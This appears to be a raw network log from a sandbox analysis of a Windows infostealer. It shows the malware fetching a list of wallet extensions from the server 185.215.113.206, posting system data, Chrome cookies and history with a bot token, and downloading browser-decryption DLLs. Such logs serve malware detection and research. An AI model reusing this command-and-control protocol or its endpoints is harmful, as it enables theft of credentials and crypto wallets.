Nov 22, 2024 20:35:04.855844975 CET	1164	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Nov 22, 2024 20:35:04.857587099 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFB Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 2d 2d 0d 0a Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="message"fplugins------KFCFBFHIEBKJKFHIEBFB--
Nov 22, 2024 20:35:05.300010920 CET	335	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:05 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 22, 2024 20:35:05.317864895 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAEHCAEGDHJKFHJKFIJ Host: 185.215.113.206 Content-Length: 6707 Connection: Keep-Alive Cache-Control: no-cache
Nov 22, 2024 20:35:05.317938089 CET	6707	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 Data Ascii: ------CBAEHCAEGDHJKFHJKFIJContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------CBAEHCAEGDHJKFHJKFIJContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Nov 22, 2024 20:35:06.416856050 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 22, 2024 20:35:06.669553995 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 22, 2024 20:35:07.118632078 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:06 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Nov 22, 2024 20:35:07.118680000 CET	124	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Nov 22, 2024 20:35:07.120942116 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:35:07.121000051 CET	1236	IN	Data Raw: 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 ea fc ff ff 83 ec 0c eb 8a 90 8d 74 26 00 83 fb 01 75 70 e8 c6 e4 0a 00 89 7c 24 08 c7 44 24 04 01 00 00 00 89 34 Data Ascii: $\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$'aT$$tL$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49750	185.215.113.206	80	7540	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:35:16.306127071 CET	629	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJ Host: 185.215.113.206 Content-Length: 427 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------CGHCFBAAAFHJDGCBFIIJ--
Nov 22, 2024 20:35:18.164558887 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 22, 2024 20:35:18.321630955 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJE Host: 185.215.113.206 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Nov 22, 2024 20:35:18.321726084 CET	1451	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 Data Ascii: ------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
Nov 22, 2024 20:35:19.273044109 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 22, 2024 20:35:19.304019928 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBAKKKFBGDHJKFHJJJJ Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="file"------GDBAKKKFBGDHJKFHJJJJ--
Nov 22, 2024 20:35:20.247627020 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 22, 2024 20:35:20.625762939 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGHJEBKJEGHJKECAAKJK Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="file"------BGHJEBKJEGHJKECAAKJK--
Nov 22, 2024 20:35:21.571528912 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 22, 2024 20:35:21.893815041 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 22, 2024 20:35:22.342279911 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:22 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 22, 2024 20:35:22.342310905 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Nov 22, 2024 20:35:22.342322111 CET	1236	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$
Nov 22, 2024 20:35:22.342371941 CET	1236	IN	Data Raw: 55 89 e5 53 57 56 83 ec 24 8b 4d 1c 8b 75 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 7d 08 8d 59 f8 83 f9 10 75 32 8d 45 dc 8d 4d e0 6a 10 ff 75 18 6a 10 50 51 57 e8 f7 93 06 00 83 c4 18 89 c7 8d 75 e8 83 45 dc f8 c7 45 d8 00 00 00 00 85 ff 0f 85 b4 01 Data Ascii: USWV$Mu01E}Yu2EMjujPQWuEEC1;]vS{EE1uuSPVEPo9]SUYY)ZYEME]M)19D
Nov 22, 2024 20:35:22.342382908 CET	896	IN	Data Raw: 00 00 00 0f 57 c8 0f 11 8c 0e 9c 00 00 00 83 c1 20 83 c3 fe 75 a6 eb 02 31 c9 f6 c2 01 74 28 0f 10 04 0f 0f 10 4c 0e 0c 0f 57 c8 0f 10 84 0e 8c 00 00 00 0f 11 4c 0e 0c 0f 10 0c 0f 0f 57 c8 0f 11 8c 0e 8c 00 00 00 31 db 8b 55 ac 39 c2 74 6b f6 c2 Data Ascii: W u1t(LWLW1U9tkt0T0U19t<f.0L0L0LL09uM17L^_[]USWVh1
Nov 22, 2024 20:35:22.342394114 CET	1236	IN	Data Raw: 10 ff 75 14 ff 75 10 53 56 ff d1 83 c4 10 31 c0 83 c4 04 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 50 68 0c 01 00 00 e8 fe f9 07 00 83 c4 04 31 ff 85 c0 74 71 89 c6 8b 5d 08 c7 40 08 01 00 00 00 8b 43 04 89 46 04 8b 03 89 45 f0 8b 43 04 8b 48 Data Ascii: uuSV1^_[]USWVPh1tq]@CFECHut7FKSrQP;KqSPVi^_[]UhV1]Uh6]
Nov 22, 2024 20:35:22.342405081 CET	1116	IN	Data Raw: 83 fe 02 0f 84 e8 00 00 00 8b 45 ec 04 03 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f 88 14 37 8b 75 14 00 d4 0f b6 cc 8b 5d 10 8a 53 02 32 14 0f 8b 4d e4 88 51 02 83 fe 03 0f 84 ac 00 00 00 8b 45 ec 04 04 0f b6 c8 8b 7d f0 8a 14 Data Ascii: E}$7$7u]S2MQE}$7$7u]S2MQttE}$7$7u]S2MQt<E}$7$7u]S2]S
Nov 22, 2024 20:35:22.350220919 CET	1236	IN	Data Raw: c7 04 8b 4d c4 d3 e8 89 45 e0 8b 4d ec 8b 45 d0 8a 55 e8 e9 78 01 00 00 c7 45 e0 00 00 00 00 8a 55 e8 8b 4d ec e9 66 01 00 00 c7 45 e0 00 00 00 00 8b 4d ec 8a 55 e8 e9 54 01 00 00 0f b6 46 01 c1 e0 08 09 c1 83 fa 02 74 09 0f b6 46 02 c1 e0 10 09 Data Ascii: MEMEUxEUMfEMUTFtFMUEM)ffo 1ffo fuEfn,0fnd0ff`faf`fafrfo5 f[fpffpfpffpfbffrf
Nov 22, 2024 20:35:22.350312948 CET	1236	IN	Data Raw: 89 c2 8b 45 d0 89 75 d8 3b 75 c8 0f 83 c7 fe ff ff 8b 55 ec 01 ca 01 cf 01 4d dc 83 7d d8 00 0f 85 c4 fc ff ff 8b 45 f0 88 90 00 01 00 00 88 98 01 01 00 00 e9 74 fe ff ff 89 f8 89 cf 83 7d d8 00 0f 85 fd fd ff ff 8b 45 f0 89 f9 88 88 00 01 00 00 Data Ascii: Eu;uUM}Et}EPEE},7,7E@2CM.USWV\2tRAA q$]
Nov 22, 2024 20:35:22.358587980 CET	1236	IN	Data Raw: 18 ff ff ff 8b 75 b4 01 ce 8b 48 44 89 8d 34 ff ff ff 8b 55 c8 11 ca 8b bd 60 ff ff ff 01 fe 89 75 b4 13 55 98 31 d3 89 5d 94 89 d3 8b 85 64 ff ff ff 31 f0 89 85 64 ff ff ff 8b 4d ec 03 4d 94 89 4d ec 8b 55 e0 11 c2 89 55 e0 31 cf 8b 75 98 31 d6 Data Ascii: uHD4U`uU1]d1dMMMUU1u1tpH8}pLE]d1]1U]uuEE11E}tBP`MBTD]H
Nov 22, 2024 20:35:23.818279028 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 22, 2024 20:35:24.268755913 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:24 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 22, 2024 20:35:25.214092970 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 22, 2024 20:35:25.685539007 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:25 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 